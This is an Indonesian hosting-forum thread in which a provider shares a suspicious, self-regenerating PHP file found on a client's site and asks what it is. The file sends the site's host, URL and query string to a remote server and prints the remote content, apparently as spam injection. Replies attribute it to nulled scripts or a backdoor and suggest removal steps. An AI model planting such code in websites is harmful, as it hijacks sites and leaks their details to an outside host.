ada yang tau script ini ??


Status
Not open for further replies.

pangeran1995

Hosting Guru
saya menemukan sebuah file aneh di website client isinya seperti ini

<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://hulunbeier.xigua668.com/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

?>

=======================
karena script ini memakan EntryProses 100 dan Ram cukup tinggi 3Gb karena saya limit akun tersebut segitu
untuk CPU nol tanpa proses akan tetapi bagian bengkak hanya di entryproses dan Ram saja.
ketika saya hapus filenya dia akan membuat ulang file tersebut. ketika di ubah permission dari 0444 menjadi 0644 akan tetapi sama saja menjadi 0444 kembali setelah di reffress

mungkin ada yang ngalami??
 

mas.satriyo

Hosting Guru
bisa jadi. pengen naikin visitor dengan cepat ya tinggal sisipin php diatas ke web orang. biasanya ya yang nulled-nulled atau dia backdoor terus sisipin deh.

soalnya nulled-er yg rada 'sopan' biasanya cuma nyisip backlink doang :D
kalo yg rusuh sih sekalian pasang backdoor
itu bisa re-create otomatis berarti ada 'temennya'
ada script autogenerate-nya
 

dhyhost

Web Hosting Service
The Warrior
Verified Provider
soalnya nulled-er yg rada 'sopan' biasanya cuma nyisip backlink doang :D
kalo yg rusuh sih sekalian pasang backdoor
itu bisa re-create otomatis berarti ada 'temennya'
ada script autogenerate-nya

berari induknya harus dihapus juga...
atau bisa di chmod aja ke 000 dari rootnya
 
Status
Not open for further replies.

Top